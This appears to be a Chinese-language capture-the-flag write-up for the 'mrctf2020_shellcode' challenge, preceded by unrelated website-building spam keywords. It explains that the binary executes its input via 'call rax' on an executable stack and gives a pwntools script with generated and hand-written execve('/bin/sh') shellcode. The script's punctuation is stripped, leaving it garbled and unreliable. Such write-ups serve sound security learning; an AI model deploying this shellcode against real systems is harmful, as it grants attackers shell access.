网站建设过程中准备的工作,中国有多少个网站,网站制作最新技术,免费培训班报名官网题目来自视频#xff1a;链接#xff1a;https://pan.baidu.com/s/17vX9dbfHkXBw71mcEXBgNQ?pwd6666 提取码#xff1a;6666查看文件类型和保护#xff0c;虽然现在的我还没有明白太多的保护。64位#xff0c;放到ida里边rbp:保存的是栈中当前执行函数的基本地址。当前执…题目来自视频链接https://pan.baidu.com/s/17vX9dbfHkXBw71mcEXBgNQ?pwd6666 提取码6666查看文件类型和保护虽然现在的我·还没有明白太多的保护。64位放到ida里边rbp:保存的是栈中当前执行函数的基本地址。当前执行函数所有存储在栈上的数据都要靠rbp指针加上偏移量来读取。、rsp:栈指针永远指向栈顶。这里使用了视频说这里用了 call rax所以不能用F5最重要的是最后call rax,[rbpbuf]他的意思就是执行输入的内容那么如果我们输入shellcode不久获取到了权限了吗。可以用gdb检查下执行权限先下断点到main然后运行 然后再vmmap 最后一个栈是可以执行的。也就是我们写入的数据。脚本这里的脚本有两个shellcode一个是手写的另一个是pwn生成的。选其一即可。from pwn import *
context(oslinux,archamd64,terminal[tmux,sp,-h]) //声明系统
#premote(node3.buuoj.cn,27250)  
pprocess(./mrctf2020_shellcode) //本地连接shellcode1shellcraft.sh()  //  用pwntools生成shellcode
payload1asm(shellcode1)  //asm将shellcode(汇编)转换成机器码shellcode2mov rbx,0x68732f6e69622fpush rbxpush rsppop rdixor esi,esixor edx,edxpush 0x3bpop raxsyscallpayload2asm(shellcode2)
#gdb.attach(p)
p.send(payload2)#p.send(payload1)
p.interactive()   //进行交互相当于回到shell的模式在取得shell之后使用